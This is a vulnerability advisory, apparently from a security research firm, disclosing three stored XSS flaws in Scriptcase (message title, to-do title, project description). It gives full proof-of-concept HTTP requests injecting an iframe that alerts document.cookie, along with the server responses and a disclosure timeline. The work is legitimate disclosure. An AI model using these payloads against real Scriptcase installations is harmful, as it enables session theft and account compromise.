Product
Severity
Fixed Version(s)
Vulnerability
Assigned CVE
Product
- Scriptcase <= 9.10.023
- Scriptcase <= 9.10.023
- Scriptcase <= 9.10.023
Severity
- xxx
- xxx
- xxx
Fixed Version(s)
- N/A
- N/A
- N/A
Vulnerability
- XSS Stored
- XSS Stored
- XSS Stored
Assigned CVE
- CVE-2024-46083
- CVE-2024-46081
- CVE-2024-46079
As described in our previous post, “Zero-Day Alert: Scriptcase Vulnerabilities (RCE)“, we have also identified XSS vulnerabilities in the latest versions of Scriptcase. Given that our researchers have discovered multiple XSS entry points, both stored and reflected, we have decided to create this post to document each entry point, assign the respective CVEs, and provide a brief explanation of why each is exploitable, along with the corresponding proof of concept.
The summary of all the XSS vulnerabilities discovered includes the following parameters and features:
- Tools -> Inbox Messages (Cross-Site Scripting Stored) -> msg.php (id_form_msg_title param)
- Tools -> To-Do List (Cross-Site Scripting Stored) -> todo.php (todo_title param)
- New Project -> Project Description (Cross-Site Scripting Stored) -> proj_new.php (Descricao param)
Below, you will find more details for each one described above.
Inbox Messages Feature (Stored XSS) – CVE-2024-46083
Request
POST /scriptcase/devel/iface/msg.php HTTP/1.1
Host: 192.168.0.135:8098
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 184
Origin: http://192.168.0.135:8098
Connection: keep-alive
Referer: http://192.168.0.135:8098/scriptcase/devel/iface/msg.php?randjs=WUBhiNNAgPJY2TzN
Cookie: sc_lang=en_us; ultimoUsuario=admin%3AN; sales1.scriptcase-_zldp=%2Blf8JBkbzCTSHkc7VgLZ%2Bs20VC49W6FwkADNdT1JaLg8d3eUTZpT1C0zUSr9Td09Ys2JwMsmvgM%3D; sales1.scriptcase-_zldt=fcd48804-fed3-4f18-b5f4-81013661c968-2; PHPSESSID=t06qbet69tma8k089enho0fblm
Priority: u=1
ajax=S&option=send_msgs&id_form_msg_to=_#NM#_admin&id_form_msg_title=<iframe src="javascript:alert(document.cookie)"></iframe>&id_form_msg_description=HawktestersResponse
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 02:20:59 GMT
Server: Apache/2.4.59 (Unix) OpenSSL/1.1.1w mod_fastcgi/mod_fastcgi-SNAP-0910052141
X-Powered-By: PHP/8.1.28
X-XSS-Protection: 0; mode=block
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2
OK
To-Do List – Title Feature (Stored XSS) – CVE-2024-46081
Request
POST /scriptcase/devel/iface/todo.php HTTP/1.1
Host: 192.168.0.135:8098
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 291
Origin: http://192.168.0.135:8098
Connection: keep-alive
Referer: http://192.168.0.135:8098/scriptcase/devel/iface/todo.php?randjs=g56GIvb30jO1AmjK
Cookie: sc_lang=en_us; ultimoUsuario=admin%3AN; sales1.scriptcase-_zldp=%2Blf8JBkbzCTSHkc7VgLZ%2Bs20VC49W6FwkADNdT1JaLg8d3eUTZpT1C0zUSr9Td09Ys2JwMsmvgM%3D; sales1.scriptcase-_zldt=fcd48804-fed3-4f18-b5f4-81013661c968-2; PHPSESSID=t06qbet69tma8k089enho0fblm
Priority: u=1
ajax=S&option=save_todo_item&todo_codigo=1&todo_folder=public&todo_title=%3Ciframe+src%3D%22javascript%3Aalert(document.cookie)%22%3E%3C%2Fiframe%3E&todo_perc=0&todo_deadline_date=08%2F15%2F2024&todo_deadline_time=00%3A00&todo_resp=admin&todo_per1=&todo_description=Hawktesters&todo_cod_apl=Response
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 02:49:07 GMT
Server: Apache/2.4.59 (Unix) OpenSSL/1.1.1w mod_fastcgi/mod_fastcgi-SNAP-0910052141
X-Powered-By: PHP/8.1.28
X-XSS-Protection: 0; mode=block
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8
OK_@NM@_
New Project(Stored XSS) – CVE-2024-46079
Request
POST /scriptcase/devel/iface/proj_new.php?randjs=B0kcG2c9Bb28g6r HTTP/1.1
Host: 192.168.0.135:8098
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1449
Origin: http://192.168.0.135:8098
Connection: keep-alive
Referer: http://192.168.0.135:8098/scriptcase/devel/iface/proj_new.php?randjs=B0kcG2c9Bb28g6r
Cookie: sc_lang=en_us; ultimoUsuario=admin%3AS; ultimoProjetoUsado=admin%3ARGfyz5xKK8iOhSQ1nYKu1Z6VCDylZY61nsIshqakeA7LKmM27ZjtTTmL3Ns0DWzcgFKqGq7JkVzi1weircc1HvcP74am40FHfO1lJ6uBsD4YE5wwL6cLBe7fhbSneusIgq1ZFQIpAuZAmlGZKVYYtYyI4ximwuSLRc0YKobffR0bu1eW0yFayvOq6h6Wd6HfLqYYTTgHVWWUyz6N6ODuiRda3XR3MGDrg5eMMzPbQEtEKlWMz362BWGFw4K3qikQ%3A0fb3879e0027e2a395edc960c3f107ad46de46fdff0db3f88a47ff322b6ccb9e; sales1.scriptcase-_zldp=%2Blf8JBkbzCTSHkc7VgLZ%2Bs20VC49W6FwkADNdT1JaLg8d3eUTZpT1C0zUSr9Td09Ys2JwMsmvgM%3D; sales1.scriptcase-_zldt=fcd48804-fed3-4f18-b5f4-81013661c968-2; PHPSESSID=t06qbet69tma8k089enho0fblm
Upgrade-Insecure-Requests: 1
Priority: u=4
imported=crm&base=&friendly_url=S&logomarca=sys__NM__crm.png&Cod_Prj=CRM2&Descricao=<iframe src="javascript:alert(document.cookie)"></iframe>&longdesc=Hawktesters&ver_major=1...SNIP...Response
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 04:06:52 GMT
Server: Apache/2.4.59 (Unix) OpenSSL/1.1.1w mod_fastcgi/mod_fastcgi-SNAP-0910052141
X-Powered-By: PHP/8.1.28
X-XSS-Protection: 0; mode=block
Expires: Fri, Jan 01 1900 00:00:00 GMT
Last-Modified: Mon, 12 Aug 2024 04:06:52 GMT
Cache-Control: max-age=15, s-maxage=0, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 10727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>ScriptCase - Create New Project</title>
...SNIP...
Timeline
- Vulnerabilities Discovered | 07/08/2024
- Reported to Vendor | 09/08/2024
- Reported to MITRE | 12/08/2024
- CVEs Assigned
- Advisories disclosed
Conclusions
If you enjoyed the article and you are interested in learning more about 0-days, exploits and cybersecurity, make sure to check out the rest of our articles.
If you are a researcher and want to take part of our team, get in touch with us. We are always looking for talent.
Zero-Day Alert: Scriptcase Vulnerabilities (RCE) - Hawktesters Research
[…] Our team has identified several XSS vulnerabilities, which are detailed further in the post: Zero-Day Alert: Scriptcase Vulnerabilities (XSS). […]